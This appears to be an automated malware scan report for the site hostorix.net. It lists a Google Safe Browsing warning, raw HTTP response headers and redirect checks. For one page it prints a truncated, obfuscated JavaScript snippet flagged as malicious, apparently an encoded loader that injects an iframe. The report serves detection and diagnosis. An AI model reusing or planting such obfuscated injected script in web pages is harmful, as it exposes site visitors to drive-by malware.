Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hostorix.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hostorix.net/ | HTTP/1.1 302 Found Connection: close Date: Fri, 12 Dec 2014 19:20:26 GMT Location: http://hostorix.net/cgi-sys/suspendedpage.cgi Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hostorix.net/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 8296 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xeitxp="spl"+"i"+"t";gzhkfs=window;pwi="0"+"x";jogewz=(5-3-1);try{--(document["body"])}catch(arlhx){snzjx=false;try{}catch(ron){snzjx=21;}if(1){efu="17:5d:6c:65:5a:6b:60:66:65:17:64:5d:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:64:5d:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:1 Antivirus reports:
| ||
http://hostorix.net/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 12 Dec 2014 19:20:28 GMT Location: http://hostorix.net/cgi-sys/suspendedpage.cgi Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hostorix.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 12 Dec 2014 19:20:26 GMT
Location: http://hostorix.net/cgi-sys/suspendedpage.cgi
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
...229 bytes of data.
GET / HTTP/1.1
Host: hostorix.net
Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 12 Dec 2014 19:20:26 GMT
Location: http://hostorix.net/cgi-sys/suspendedpage.cgi
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
...229 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hostorix.net
Referer: http://www.google.com/search?q=hostorix.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hostorix.net
Referer: http://www.google.com/search?q=hostorix.net
Result:
The result is similar to the first query. There are no suspicious redirects found.